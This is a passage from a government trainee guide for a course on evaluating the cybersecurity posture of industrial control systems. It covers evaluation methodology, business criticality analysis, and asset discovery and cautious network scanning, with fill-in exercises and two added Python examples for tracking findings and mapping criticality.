
Disclaimer

This presentation is intended for informational and discussion purposes only.


The U.S. Department of Homeland Security (DHS) does not provide any warranties of any kind
regarding this information. In no event shall the United States Government or its contractors or
subcontractors be liable for any damages, including but not limited to, direct, indirect, special, or
consequential damages, arising out of, resulting from, or in any way connected with this
information, whether or not based upon warranty, contract, tort, or otherwise, whether or not
arising out of negligence, and whether or not injury was sustained from, or arose out of the results
of, or reliance upon the information.
The display of the DHS official seal or other DHS visual identities, including the Cybersecurity and
Infrastructure Security Agency (CISA) name or logo shall not be interpreted to provide any person
or organization the authorization to use the official seal, insignia, or other visual identities of the
Department of Homeland Security, including CISA. The DHS seal, insignia, or other visual
identities shall not be used in any manner to imply endorsement of any commercial product or
activity by DHS, CISA or the United States Government. Use of the DHS seal without proper
authorization violates federal law (e.g., 18 U.S.C. §§ 506, 701, 1017), and is against DHS policies
governing usage of its seal.
DHS does not endorse any commercial product or service, including any subjects of
analysis. Any reference to specific commercial products, processes, or services by service mark,
trademark, manufacturer, or otherwise, does not constitute or imply endorsement,
recommendation, or favoring by DHS.
Training personnel do not discriminate on the basis of race, color, religion, national origin, sexual
orientation, physical or mental disability, or gender expression/identity. Nor do they possess
proprietary interest in any product, instrument, device, service, or material discussed in this
course.

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________

2|Page
Disclaimer .............................................................................................................................................. 2
Course Welcome ................................................................................................................................... 5
Introduction ........................................................................................................................................ 5
Trainee guide ..................................................................................................................................... 6
Cybersecurity plan template ............................................................................................................... 6
Introduction to Netlab video ................................................................................................................ 6
Analysis and Evaluation Overview ......................................................................................................... 7
Assessment vs. analysis and evaluation ............................................................................................ 8
Changing the culture .......................................................................................................................... 9
Components of an ICS evaluation .................................................................................................... 10
Step 1 – Analyze Business Purpose .................................................................................................... 16
Step 2 – Identify Assets ....................................................................................................................... 22
Identifying assets within ICS networks.............................................................................................. 23
Asset discovery activity .................................................................................................................... 25
Asset discovery demonstration notes: .............................................................................................. 31
Asset inventory prioritization............................................................................................................. 31
Asset inventory prioritization exercise............................................................................................... 31
Asset inventory recap ....................................................................................................................... 33
Step 3 – Determine ICS Connectivity ................................................................................................... 35
Packets and protocols ...................................................................................................................... 36
Packets and protocols demonstration using Windump notes: ........................................................... 40
Packets and protocols activity #1 ..................................................................................................... 40
Packets and protocols demonstration using Wireshark: ................................................................... 42
Packets and protocols activity #2 ..................................................................................................... 43
Discover undesired activity demonstration: ...................................................................................... 45
Network segmentation demonstration .............................................................................................. 46
Network segmentation exercise........................................................................................................ 53
Network segmentation exercise recap .............................................................................................. 58
Packets, protocols, and segmentation recap .................................................................................... 58
Evaluate network monitoring capabilities .......................................................................................... 61
Network IDS monitoring demonstration ............................................................................................ 65
Detection and monitoring.................................................................................................................. 66
Logging and monitoring exercise ...................................................................................................... 69
Wazuh demonstration ...................................................................................................................... 69
Incident response ............................................................................................................................. 70
Incident response exercise ............................................................................................................... 71
Detection and monitoring recap ........................................................................................................ 72
Wireless in ICS environments .......................................................................................................... 73
Wireless threats ............................................................................................................................... 79
ZigBee attacks ................................................................................................................................. 86
RF capture tools ............................................................................................................................... 90
Mobile analyzers .............................................................................................................................. 98
Texas Instruments packet sniffing instructions ................................................................................. 98
Wireless packet analysis - ZigBee .................................................................................................... 99
Wireshark packet analysis - Wi-Fi ...................................................................................................105
Wireless Recap ...............................................................................................................................108
Step 4 – Determine ICS Dependencies ............................................................................................. 110
Determine ICS dependencies..........................................................................................................111
Dependencies Exercises 1 and 2 ....................................................................................................118
Dependencies Recap ......................................................................................................................119
Step 5 – Assess Risk to Business...................................................................................................... 120
Threats to ICS .................................................................................................................................121
Operations security (OPSEC)..........................................................................................................125
Open-source intelligence (OSINT)...................................................................................................128
Physical OPSEC .............................................................................................................................130
Hawaii Emergency Management Agency OPSEC Exercise ............................................................130
Threats, vulnerabilities, risk .............................................................................................................131
OPSEC, OSINT recap .....................................................................................................................132
Evaluate adversarial risk .................................................................................................................134
Phishing exercise ............................................................................................................................135
Adversarial tactics and techniques ..................................................................................................147
Host discovery exercise ..................................................................................................................152
Adversarial tactics and techniques (continued)................................................................................160
Adversarial risk recap ......................................................................................................................164
Assess supply risk...........................................................................................................................165
Supply chain exercise .....................................................................................................................168
Third-party access...........................................................................................................................172
Third-party exercise questions ........................................................................................................174
Supply chain recap ..........................................................................................................................175
Step 6 – Determine Critical Risk ........................................................................................................ 176
Step 7 – Recommend Actions............................................................................................................ 185
Step 8 – Monitor and Reassess ......................................................................................................... 189
Appendix A. Content References ....................................................................................................... 193
Appendix B: Dear Island Treatment Plant Wastewater Collection and Treatment .............................. 194
Appendix C: TCP Ports used by PLC’s (Programmable Logic Controllers) and HMI/OIT’s ................ 196

Course Welcome
Introduction
The purpose of this course is to provide training on analyzing, evaluating, and documenting the
cybersecurity posture of an ICS system for internal and/or external recommended changes.
Specifically, the course will utilize a repeatable process to analyze cybersecurity weaknesses and
threats, evaluate and map findings, and document potential mitigations. Trainees will also be able to
download a template that can be used for evaluations at their workplace.
During this course, trainees will gain real-world experience in analyzing ICS cyber-weaknesses and
threats, documenting mitigation possibilities, and providing ongoing resolutions to strengthen the
cybersecurity posture of an evaluated ICS system environment.
Learning objectives
At the end of this course, trainees will be able to:
1. Discuss components of an ICS evaluation
2. Identify assets within ICS networks
3. Determine ICS connectivity
4. Evaluate network monitoring capabilities
5. Discuss the use of wireless in ICS environments
6. Determine ICS dependencies
7. Evaluate risk using OSINT and OPSEC methods
8. Evaluate adversarial risk
9. Assess supply risk
10. Evaluate risk management and mitigation approaches
Course requirements
CISA encourages active and full participation in this course. However, we also realize motivations for
completing the course may vary. Ultimately, the level at which you choose to participate is completely
up to you, the trainee. However, if you wish to earn Continuing Education Units (CEU) that are part of
this course, then meeting all the requirements will be important.
Sessions
This course contains twelve sessions. Each session contains multiple videos and activities that are
expected to take between 20 minutes to 1 hour each to complete. If a trainee wishes to earn CEUs, fast
forwarding through videos is prohibited.
Video completion is required to progress through the course. This means trainees must complete video
1 before video 2 will become available, etc.
Can I still attend a live event? Registrants of this virtual training are eligible to attend the live
(classroom) version of this course whether or not they complete all sessions.
Instructional/technical support
If you have questions related to the course content or require technical support, contact one of our
instructional support staff at nhs-training@inl.gov.

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
Continuing education units
Our organization is accredited by the International Association for Continuing Education and Training
(IACET) and is accredited to issue IACET Continuing Education Units (CEUs).
Our organization is authorized by IACET to offer
1.3 CEUs. This number is based on 13 student
engaged contact hours.
At the conclusion of this course, trainees will
receive a certificate of completion which can be
used to provide evidence of completion of
continuing education requirements.
NOTE: CEUs will not be given for partial
completion of this course.

Trainee guide
This guide has fill-in-the-blank activities that will help trainees get the most out of the course. We
recommend downloading and completing the activities as trainees navigate through each video
within each session. Trainees may print this document or use the PDF version to electronically fill in
the blanks. This guide is for trainee benefit only and completion is not a requirement for the course.

Cybersecurity plan template


One encouragement from our instructors throughout this training is the importance of having a
cybersecurity plan so if/when something happens, you have a plan to address it. As such, we have
provided an example cybersecurity plan template for you download and use when creating/updating
your own plan.

Introduction to Netlab video


Some of the activities contained in this course require the use of an external website,
https://ics-labs.inl.gov. Watch the video contained in the Welcome session to ensure you are familiar
with the process for registering for these activities.

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
Analysis and Evaluation Overview
Definitions, culture, and components of an ICS analysis and evaluation

TRAINEE GUIDE

Outcomes
In this overview, trainees will be able to discuss the components of an ICS evaluation.

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
Virtual ICS Cybersecurity Analysis and Evaluation Training - 401V
Assessment vs. analysis and evaluation

Assessment                                           | Analysis & Evaluation
-----------------------------------------------------|-------------------------------------------------------
Generally P2P activity                               | Ongoing over time activity
Compliance against (internal and external) standards | Not compliance focused - incorporated as required
Diagnostic in nature, scored against a process       | Judgement in nature, measured against product value
Measurement - absolute per standard                  | Measurement - comparative against business objectives
Security posture re-assessed at long-term intervals  | Security posture re-assessed continuously

_________________________________ _________________________________
_________________________________ _________________________________
_________________________________ _________________________________
_________________________________ _________________________________

Why establish an ICS evaluation program?


According to a statement made by John Fryer, Senior Director of Product Management & Marketing
at Stratus Technologies, the number of connected devices by 2020 will range from 50 billion to more
than 200 billion – “Many of these devices will be industrial machines – from production line equipment
to pipeline pumps and monitors – transforming manufacturing and process automation.”
Many evaluation programs/systems are based on compliance. The process taught in this class is meant
to be a business enabler and is not focused on regulatory compliance.
Having said that, this course incorporates regulatory considerations in evaluation phases, and this
focus is designed to help an organization understand its vulnerabilities and risks and show how
organizations can provide recommendations to continually improve cybersecurity posture.

IMPORTANT: No organization will ever be ‘completely’ secure. However, if the only reason an
organization evaluates its own systems is based on regulation, they are more vulnerable than secure.
Creating an ICS cybersecurity self-evaluation process is critical to sustainable practice.

______________________________________________________________
Evaluations help the business understand their vulnerabilities and risks and how to provide
recommendations to continually improve in cybersecurity posture.
______________________________________________________________

______________________________________________________________
______________________________________________________________
Changing the culture
Current culture (Automation World Survey, 2017)
• Fewer than 10% of companies have combined IT and OT departments
• 24% say IT and OT departments have no to little interaction
• 61% report no cross-training being performed between IT and OT
Future “culture”: bridge the IT and OT gap
• Form special projects
  • Increased connectivity lends to business projects needing both IT and OT
  • Plant/system data are needed to drive overall business intelligence
• Seek to create partnerships between IT and OT
  • Help each other by understanding/training on uniqueness between IT and OT
  • Seek to understand before seeking to be understood (build process connections)
• Embrace convergence between IT and OT
  • IoT protocols span IT and OT worlds, allowing communication (ex: MQTT)
  • IT and OT must tackle intersecting initiatives between physical and digital worlds

_____________________________________________________
_____________________________________________________
_____________________________________________________
_____________________________________________________
_____________________________________________________
Learning Objective 1
Components of an ICS evaluation
ICS evaluation components
____________________________________________________________________________
1. Establish an ICS evaluation methodology

____________________________________________________________________________
2. Determine evaluation entry qualifiers

____________________________________________________________________________
3. Establish roles / team to perform evaluation

____________________________________________________________________________
4. Prepare evaluation to cover entire SDLC

____________________________________________________________________________
5. Establish expected outcomes and products of evaluation process

____________________________________________________________________________
6. Establish an issues and findings tracking mechanism, and a final report mechanism to close the findings.

ICS evaluation methodology

Reference for 401 course evaluation process: Handbook for Self-Assessing Security
Vulnerabilities & Risks of Industrial Control Systems on DoD Installations, 2012

_____________________________________________________
This methodology really is the rest of the learning objectives.
_____________________________________________________
Qualifiers - it is like we make sure we evaluate correctly.
_____________________________________________________
Example: who is leadership/management, who owns ICS assets, what are the business policies and procedures,

_____________________________________________________
what are the technical procedures and policies, like change management plans.
_____________________________________________________
Technical evaluations, like existing infrastructure, disaster recovery, identification and authentication, etc.
Once the qualifiers are set up, then we need to move to potentially structure the team with
participant roles.
Evaluation entry qualifiers/organizational and technical
Many of these qualifiers come from the Defense-in-Depth Strategy Elements found in CISA’s document
NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf. That document broke up elements into
Organizational and Technical Qualifiers an evaluator should use when the goal is to fully complete an
evaluation.
Evaluating an ICS environment is not an exact science. As such, the idea of having qualifiers to bind
your evaluation topics and resulting artifacts will vary by the business/industry/sector. The table below
is provided as an example and is not meant to be prescriptive.

Participant roles
The training roles may not match your organizational roles. They are designed to align the course
material and the capstone exercise. One person can perform multiple roles.
 _____________________________
Evaluation Team Lead or Alternate Team Lead

 _____________________________
OT Analyst/Cyber Physical Security

 _____________________________
OT Analyst/Network Connectivity

Wireless analyst
 _____________________________
 _____________________________
Ones who perform best in offensive cyber-

Adversarial risk Analyst


 _____________________________
 _____________________________
Reporting / Documentation Chief

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
Systems development life cycle (SDLC)
The entire goal of this evaluation process is to provide recommendations to an organization for
improvement in ICS cybersecurity posture. As such, the evaluation process will review gaps in security
across the SDLC. Recommendations for including security into the SDLC include: 1) initiation, 2)
development/acquisition, 3) implementation/assessment, 4) operation/maintenance, and 5) disposal.

Establish expected outcomes and products


Qualitative vs. quantitative
Reporting Outcomes: Considering the evaluation process is meant to result in recommendations, it is
critical to ensure these recommendations are:
• Standardized – you would not want to do 3 different evaluations and have the same findings
  without a standardized approach to risk mitigation
• Practical – your recommendations should balance the complexity of the solution as well as the
  cost-effectiveness of the solution as part of the consideration
• Reliable/Repeatable – the results of your recommendations, when tested, should perform in a
  reliable state. It is a good idea to recommend tested solutions vs. just hypothetical solutions that
  could cause more harm than help. A simpler word for this might be repeatable results each
  time.
• Valid – It is critical you ensure you can validate your claim when making a recommendation.
  Seek outside help and do not just rely on textual recommendations. Consider suggesting to
  businesses they also validate their internal recommendations before implementing a solution.

______________________________________________________________
In cybersecurity and ICS systems in general we need to make sure we understand the recommendations
from NIST 800. We need to consider the cybersecurity that spans into our system from phase 1,
Initiation, as shown in the picture above in the SDLC, from initiation to direct disposal.
______________________________________________________________

______________________________________________________________
______________________________________________________________
Evaluation products:
• Issues and findings report
• Final report
• Update or establish cybersecurity policy and procedures

Issues and findings


Issue: ____________________________________________________________________________
Finding: __________________________________________________________________________
__________________________________________________________________________________
Issues and findings tracking mechanism
NOTE: An example report can be downloaded from this course.
Document all issues in a report. Create columns in a spreadsheet similar to the following examples,
based on your business risk management requirement(s).

Control: AC-17(3)
NIST 800-53 Control Family: Network - Remote Access
Issue: System has multiple remote access options
Discovery: Remote access can grant malicious individuals persistence and ease of access to
company resources.
Risk: Remote access can grant malicious individuals persistence and ease of access to company
resources.

Control: AU-11
NIST 800-53 Control Family: Detection - Logs
Issue: Logs are not kept long enough or data within them is overwritten too fast to be of value
Discovery: No authoritative time source within system.
Risk: Lack of uniform time source can create inefficiencies when performing forensic analysis of
logs, and may cause other time-related issues.
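One way to keep the tracker above machine-checkable, as an added example that is not part of the course materials: the two rows are the guide's own examples, while the CSV wrapper, the control-id pattern check and the third (deliberately malformed) row are constructed for this example.

```python
"""Issues-and-findings tracker in the column layout the guide suggests:
Control, NIST 800-53 Control Family, Issue, Discovery, Risk.
Added example, not course material. The first two rows are the guide's own
examples; the CSV form, the validation rules and the third row are assumptions."""
import csv
import io
import re
from collections import Counter
from dataclasses import dataclass

# NIST SP 800-53 identifiers look like "AC-17" or "AC-17(3)":
# two-letter family, control number, optional enhancement in parentheses.
CONTROL_ID = re.compile(r"^[A-Z]{2}-\d+(\(\d+\))?$")
COLUMNS = ["Control", "NIST 800-53 Control Family", "Issue", "Discovery", "Risk"]

# Constructed CSV export of the tracker spreadsheet. Row 3 is intentionally
# incomplete (bad control id, empty Discovery) to exercise the checks.
SAMPLE_TRACKER_CSV = """Control,NIST 800-53 Control Family,Issue,Discovery,Risk
AC-17(3),Network - Remote Access,System has multiple remote access options,Remote access can grant malicious individuals persistence and ease of access to company resources.,Remote access can grant malicious individuals persistence and ease of access to company resources.
AU-11,Detection - Logs,Logs are not kept long enough or data within them is overwritten too fast to be of value,No authoritative time source within system.,"Lack of uniform time source can create inefficiencies when performing forensic analysis of logs, and may cause other time-related issues."
SI17,Detection - Patching,Constructed row with a malformed control id,,Constructed risk text
"""


@dataclass
class Finding:
    control: str
    family: str
    issue: str
    discovery: str
    risk: str

    def family_code(self) -> str:
        """Two-letter family prefix of the control id, e.g. 'AC' for AC-17(3)."""
        return self.control.split("-")[0]


def validate(f: Finding) -> list:
    """Return the problems with one row; an empty list means the row is complete."""
    problems = []
    if not CONTROL_ID.match(f.control):
        problems.append(f"malformed control id: {f.control!r}")
    for name in ("family", "issue", "discovery", "risk"):
        if not getattr(f, name).strip():
            problems.append(f"empty column: {name}")
    return problems


def load_findings(csv_text: str) -> list:
    """Parse a CSV export of the tracker into Finding records, checking the header."""
    reader = csv.DictReader(io.StringIO(csv_text))
    missing = [c for c in COLUMNS if c not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"tracker is missing columns: {missing}")
    return [Finding(*(row[c].strip() for c in COLUMNS)) for row in reader]


def invalid_rows(findings) -> list:
    """(control id, problems) for every row that fails validation."""
    return [(f.control, validate(f)) for f in findings if validate(f)]


def summarize_by_family(findings) -> Counter:
    """Count complete findings per NIST 800-53 family (AC, AU, ...)."""
    return Counter(f.family_code() for f in findings if not validate(f))


if __name__ == "__main__":
    rows = load_findings(SAMPLE_TRACKER_CSV)
    print("findings per family:", dict(summarize_by_family(rows)))
    for control, problems in invalid_rows(rows):
        print(f"row {control!r} needs attention: {problems}")
```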

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
Final evaluation report
The executive summary should include:
• Date, purpose, scope
• Initial or follow-up
• Bound evaluation (organization-wide, business/mission specific, system specific)
• List findings and recommended actions
• Describe risk
The body of the report should include:
• Describe, in full, the purpose of the evaluation (what answers are being sought)
• Identify assumptions and constraints
• Provide a rationale for any risk-related decisions during the evaluation (risk recommendation)
  process
• Describe uncertainties with evaluation process
• Describe specific business, organization(s), systems evaluated
• Summarize evaluation results
• Identify time frame of evaluation
• List critical issues that present risk based on adversarial threat
The appendices should include:
• References
• Team or individuals conducting the evaluation
• Evaluation details to include issues and findings report; other supporting evidence

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
ICS cybersecurity policy and procedures
ICS uniqueness:
• ICS/supervisory control and data acquisition (SCADA) lack standard security guidelines, not
  uniform like IT systems
• Companies may need to create/maintain system-specific ICS cybersecurity practices
• These business practices should be documented, enforced, and updated regularly
• Establishing policy, procedure, and/or process
• Evaluation best not performed as a ‘one-off’
• ICS cybersecurity success requires establishing/maintaining ICS cybersecurity policy

______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
Step 1 – Analyze Business Purpose
Business criticality, purpose, and function

TRAINEE GUIDE

Outcomes
Now that we know the important components of an ICS cybersecurity evaluation, let’s discuss each
step within the process, beginning with Step 1, Analyze Business Purpose. In this session, trainees will
learn to analyze business purpose.
Step 1- Analyze Business Purpose
Criticality analysis
 Prioritization of business functions based on:
 _________________________________________________________________________
____________________________________________

 _________________________________________________________________________
____________________________________________

 ______________________________________________________________________
_______________________________________________

 ____________________________________________________________________________
_________________________________________

 ______________________________________________________________________
_______________________________________________

 Priority to business is based on:

 _________________________________________________________________________

 _________________________________________________________________________

 Sample criticality analysis process (NISTIR 8179)1


 Originates from Failure Mode Effects and Criticality Analysis (FMECA)
 First mention – NIST SP 800-53 Rev. 4 (April 2013); now in several NIST special publications
 Model flows through design, acquisition, implementation, disposal of projects and systems

Business – critical priority analysis
The five main criticality analysis processes are:
A. Define criticality analysis procedure
B. Conduct program level criticality analysis
C. Conduct system/subsystem level criticality analysis
D. Conduct component/subcomponent level criticality analysis
E. Conduct detailed review of criticality for processes B, C, and D

 _____________________________________________________

 _____________________________________________________

 _____________________________________________________

 Obtain or define program goals and objectives, assumptions, and


constraints
 Obtain, design, or document a high-level process for completing
program objectives
 Identify interactions, intersections, connections, and program
dependencies
 Define how program will operate normally and how will it operate if
impacted by an adverse operating state (an operating state that is
not normal)
 Assign baseline criticality levels to workflow paths based on
gathered information

 _____________________________________________________

 _____________________________________________________

 _____________________________________________________

 _____________________________________________________

 _____________________________________________________

 Scope/frame the analysis to a specific system or subsystem


 Identify system functionalities, capabilities, and pathways needed
to fulfill functional requirements
 Match components and subcomponents to the identified system
functionalities, capabilities, and pathways
 Define normal operating conditions and those conditions that
system/subsystem will be operating sub-optimally, referred to as
adverse operating states
 Assign baseline criticality to the components and subcomponents
identified earlier

 Identify and map interactions, intersections, connections, and
dependencies across:
o Program
o System/Subsystem
o Component/Subcomponent
 Identify controls protecting the system to be used
 Review impact of operating states
 Validate, apply, and trace any available risk information
through interactions, intersections, connections, and
dependencies.

Perfume Specialty Chemical Scenario


Identify business purpose and functions
 Major Business Purpose: Create ‘perfume’
 Major business ‘programs’ listed:
 Perfume manufacturing/blending
 Perfume business/sales
 Perfume distribution
 Perfume feedback storage
 Draw connecting lines representing process flow
 Perfume manufacturing/blending
 Perfume business/sales is connected upwards and downward
 Perfume has both a distribution and storage component
 Business criticality provides evaluation guidance
 Sets context for priority in interviews
 Sets context for priority in risk mitigation
 Sets context for priority in evaluation resources
 Based on the example to the right:
 Which is the most critical function?
 What are the major systems in the diagram?
 What are the subsystems in the diagram?

 Assign a priority for each function:
 Ranked 1 (least important) to 10 (most
important)
 If I lose this function:
 What happens to business purpose?
 What happens to other functions?
 What is the overall business impact?
 Criticality map can be used to:
 Identify true ‘impact’ of critical risk
 Establish priority order for which system(s) to evaluate
 Establish priorities for risk mitigation and resource allocation
 Establish priorities for process modifications and change management
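The “if I lose this function” question above can be answered mechanically once the connecting lines are drawn. The following Python is an added example for this guide (it is not course material and not part of NISTIR 8179): it takes the four perfume-scenario functions, assumed 1–10 priorities, and assumed process-flow edges (sales sits between manufacturing and distribution, and feedback storage hangs off sales), then computes each function’s total impact as its own priority plus the priority of everything it takes down with it.

```python
"""Criticality map for the perfume scenario: what happens if a function is lost.

Added example for this trainee guide; not course material and not NISTIR 8179.
The function names come from the scenario; the priorities (1 = least
important, 10 = most important) and the dependency edges are assumptions.
"""
from collections import deque

# Own priority of each function, 1..10, as the course asks you to assign (assumed values).
PRIORITY = {
    "manufacturing/blending": 9,
    "business/sales": 7,
    "distribution": 6,
    "feedback storage": 3,
}

# downstream function -> the functions it needs in order to operate (assumed process flow).
DEPENDS_ON = {
    "manufacturing/blending": [],
    "business/sales": ["manufacturing/blending"],
    "distribution": ["business/sales"],
    "feedback storage": ["business/sales"],
}


def dependents_of(lost, depends_on=DEPENDS_ON):
    """Every function that stops working, directly or transitively, if `lost` is lost."""
    consumers = {}                       # invert the map: upstream -> downstream users
    for down, ups in depends_on.items():
        for up in ups:
            consumers.setdefault(up, set()).add(down)
    seen, queue = set(), deque([lost])   # breadth-first walk; `seen` also guards against cycles
    while queue:
        f = queue.popleft()
        for d in consumers.get(f, ()):
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return seen


def impact(lost, priority=PRIORITY, depends_on=DEPENDS_ON):
    """Total impact: own priority plus the priorities of everything it takes down."""
    affected = dependents_of(lost, depends_on)
    return priority[lost] + sum(priority[f] for f in affected), sorted(affected)


def criticality_map(priority=PRIORITY, depends_on=DEPENDS_ON):
    """Rank functions by total impact: the order in which to evaluate and mitigate."""
    rows = [(name, priority[name], *impact(name, priority, depends_on)) for name in priority]
    return sorted(rows, key=lambda r: r[2], reverse=True)


if __name__ == "__main__":
    for name, own, total, affected in criticality_map():
        print(f"{name:24s} own={own:2d} total_impact={total:2d} also loses: {', '.join(affected) or '-'}")
```

The ranking differs from a ranking by own priority whenever a modestly rated function sits upstream of several others; that gap is the “true impact” the criticality map is meant to expose, and the total-impact order is the order in which to schedule interviews and evaluation resources.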
Change management
 Does our company have a Cybersecurity Plan?
 Does our company have an ICS Cybersecurity Plan?
 What policy, process, and/or procedures do I need to consult, modify, or create to protect
business critical functions?
NOTE: Download the ‘Cybersecurity Plan’ available in the introduction section of this course for a
full listing of options for building a Cybersecurity Plan and/or an ICS Cybersecurity Plan

Review
 _________________________________________________________________________

 _________________________________________________________________________

 _________________________________________________________________________

 _________________________________________________________________________

 _________________________________________________________________________

 _________________________________________________________________________

Step 2 – Identify
Assets
Asset discovery and prioritization

TRAINEE GUIDE

Outcomes
Once you have identified the critical areas of your business and the focus of your evaluation, you will
move into the second step of your evaluation, Identify Assets. This step is critical to your evaluation
because you cannot defend what you do not know. In this session, trainees will learn to identify assets
within ICS networks.

Learning Objective 2
Identifying assets within ICS networks

Asset Inventory
It is accurate and complete, right?
 Asset inventory is vital, but many times elusive
 You cannot defend what you don’t know

“Understanding and solving the asset inventory and device visibility problem
is critical in managing a business’ security program.”
– Implementation guide to ICS

Why is your asset inventory challenging?


 __________________________________________________________________________
 ________________________________ from multiple vendors, lack of up-to-date diagrams,
unique industry and application-specific protocols (some of which are not IP-based), and the
difficulty in conducting physical inventories in dispersed or hostile environments compound
these challenges.
True or False?
 Never scan a live ICS network? ________
 Always scan your ICS network – you can’t defend what you don’t understand? ________
 The way to prevent an unacceptable impact is to prepare correctly? ________

“No one likes to scan live networks because this can, and has, caused outages. We have never
caused an unacceptable impact to operations.”
– Digital Bond*

We should land somewhere in between. Be VERY cautious when scanning a live ICS. Use passive tools
when possible, and when you do scan be educated on how you scan.

What does cautious scanning mean?
 When possible, use a development system (sandbox) to avoid scanning a live system
 Do not flood the network with multiple scans
 Talk to vendors, consult manuals etc., to identify devices that may be scan-sensitive
 Pick an optimal time to test (e.g., low or zero traffic hours)
 Outage, maintenance cycle, etc.
 Identify disaster recovery, especially to critical assets
 If it is not OK for a device to go down, avoid scanning that device or have recovery options
identified.
 Run tools such as Nmap with timing options to avoid heavy network traffic
 Use NSE scripts or Nmap scripts that are gentle to the ICS environment. These scripts send
expected or legitimate commands to the device to avoid unexpected responses.
 Use credentialed (privileged user) scans – they ask the host about itself rather than probing it, so
they are friendlier to systems
 Create a scanning account and disable when complete
 Communicate – ensure everyone who needs to know you are scanning, knows and avoids an
RGE (resume generating event)

Asset discovery activity


This exercise will cover how to use a PCAP to discover the assets of a network.
NOTE: This exercise is done virtually using Netlabs. Before completing this exercise,
view the “Introduction to Netlab” video located in this course.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid closing your VLP
session.
2. Login and schedule a reservation for the Learning Objective 2: Identify Assets
Exercise.
3. Enter your reservation.
4. Follow the instructions listed below.

Lab Settings
The information in the table below lists the basics of the environment.
Virtual Machine IP Address Account (if needed) Password (if needed)
Kali Auto Logged in - root Auto Logged in - toor

1. To begin the exercise, click the Kali Linux Host in the diagram or on the tab listed at the top.
2. You are welcome to use any other tool on the supplied Kali host (GrassMarlin, Zenmap,
Wireshark etc. – the files in the directory listed below are your only inputs). This guide will walk
you through how to use GrassMarlin and Wireshark.
3. Open the GrassMarlin application or any other tool that you would prefer.
NOTE: View an example of how to complete this exercise using the GrassMarlin tool on page
26.
4. Access the PCAP from /Desktop/pcap_file/AssetInventory/
5. The file name is acme_pcs_traffic.pcap
GrassMarlin will take all the conversations from the PCAP and present them in a graphic to help
you identify the assets and the IP address of each.
6. Use the information from GrassMarlin to discover what IP addresses exist on the network. Fill in
the missing IP’s on the network map on the following page
7. Here is a list of known hardware supplied by your fellow field technician
a. 3 Sony Cameras
b. Allen Bradley HMI and PLC
c. Siemens HMI and PLC
d. GE HMI and PLC
e. Two Electrol Meters
f. The I/O server (Windows OS that communicates via Modbus and DNP3)
g. Juniper Firewall


[Network map: PCS network diagram for the asset discovery exercise; fill in the missing IP addresses.
One host on the map is labeled 192.168.10.100.]
Asset inventory exercise example
1. Open the GrassMarlin application (inside the Kali VM)

2. From the FILE menu select Import Files

3. The import files dialog will pop up. Select Add Files

4. The Add Files dialog will pop up
5. Select the PCAP file acme_pcs_traffic.pcap from the pcap_files directory
6. Select Open
7. From the Import dialog select Import Selected
8. Once the import is complete, close the Import dialog window.
9. Select the Logical Graph tab to view the network layout.
10. Use this information to fill in the PCS network diagram.

NOTE: This example is from one of our classroom networks. It can be helpful to click-and-drag
common network IP’s into groups. YOUR DATA WILL NOT MATCH THIS NETWORK.

End your reservation and return to the learning portal to continue with the next video.

Asset discovery demonstration
Take any notes from the online demonstration:
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________

Asset inventory prioritization


Do we need to do anything else to confirm our asset inventory?
 What about non-network connected devices?
 How do we find these?
 __________________
 __________________
 __________________
 __________________

Asset inventory prioritization exercise


Resources are prioritized based on the classification, criticality, and organizational
value. Use the ICS network map provided on the next page to complete this exercise.
1. Circle a device or devices with RED, YELLOW or GREEN to indicate prioritization
with RED being the highest and GREEN the lowest. You may also instead mark
each device with one of the following:
a. H Highest priority
b. M Medium priority
c. L Lower priority
2. To help prioritize, ask the question, if we lose that (server, HMI, switch) what impact will that
have? Document your results on the map and in the space below.
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________
________________________________________________________________________

Return to the learning portal and continue with the next video.
Asset inventory recap
Evaluation questions
During this step, you can ask the following questions to identify any gaps.
 Are resources prioritized based on their classification, criticality, and business value?
 Are physical devices and systems within the organization inventoried?
 Are software platforms and applications within the organizations inventoried?
 Does the organization check that the version of all acquired applications software being used
are still supported by their vendors?
 Are unsupported software versions in use? Is the system updated or patched to the most
current version?
 Is a baseline configuration of IT/OT systems created and maintained?
 Does the organization maintain asset inventory of all systems connected to the network?
 Is physical access to assets managed and protected?
 Is the physical environment monitored to detect potential cybersecurity events?

Cybersecurity plan mapping

Common issues/findings
 System Diagrams & documentation is missing/incomplete.
 No change management/ configuration control
 Poor/Non-existent boundary controls
 No separate test environment to test changes outside of the operational environment.
 Unauthorized parties have access to sensitive/critical devices.
 No password policy
 No process governing the implementation of remote access
 Remote Access does not use multi-factor authentication.
 Control System resides on same system/network as Enterprise/IT network.
 Laptops can be used across domains
 No notification of user/employee change
 No mobile device policy

Step 3 – Determine
ICS Connectivity
Network segmentation, network monitoring
and detection, incident response, and wireless

TRAINEE GUIDE

Outcomes
In this session, trainees will learn to determine how, and whether, the assets identified in the previous
session are connected appropriately. This brings us to Step 3 in the process, Determine ICS Connectivity.

Learning Objective 3
ICS connectivity
Packets/Protocols: Which protocols are normally in use in operations? We will cover this, along with
what they look like, by learning how to capture packets, taking a closer look at the protocols in those
captured packets to baseline what is normal, and learning which port numbers commonly appear for
protocols in ICS packet captures. We will also provide a hands-on demo that includes tools to explore
these concepts.
Network Segmentation: Examining captured packets from an existing network can help reveal whether
other networks exist. How is the network designed? Is it a single network or is it divided into several?
Why divide it into more than one network? Another hands-on demo will encourage you to consider
ways to further segment an existing design and rebuild it into your own network.
Critical Data Points: Significant connections for mission success. What data paths traverse the
network segments and carry critical data? Are these fragile links well understood? Are they
documented? Which personnel are aware of them? Is there a plan to recover these paths if something
goes wrong? These are some example concerns to consider. There may not be a perfect answer to
each, but simply bringing the concerns to light sets in motion the steps needed to help an organization
